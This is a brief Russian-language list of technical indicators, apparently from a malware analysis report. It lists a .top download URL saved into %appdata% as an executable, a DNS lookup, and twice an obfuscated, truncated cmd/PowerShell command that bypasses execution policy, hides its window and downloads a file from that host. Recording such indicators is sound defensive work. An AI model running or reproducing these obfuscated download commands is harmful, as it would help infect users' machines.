Техническая информация
- http://zussipussicscds.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pO^wE^r^SHel^l.eX^E -eXecutI^ON^p^O^li^Cy by^p^A^SS -NO^p^rO^f^ILe ^-wINdO^wS^tY^le ^HId^DeN (^n^Ew-obJeCT^ ^Sy^ste^M.n^e^T.w^eB^c^lieN^t).^dow^n^lOaDFilE(^'http://zussi...
- DNS ASK zu####ussicscds.top
- '<SYSTEM32>\cmd.exe' /c "pO^wE^r^SHel^l.eX^E -eXecutI^ON^p^O^li^Cy by^p^A^SS -NO^p^rO^f^ILe ^-wINdO^wS^tY^le ^HId^DeN (^n^Ew-obJeCT^ ^Sy^ste^M.n^e^T.w^eB^c^lieN^t).^dow^n^lOaDFilE(^'http://zussi...' (со скрытым окном)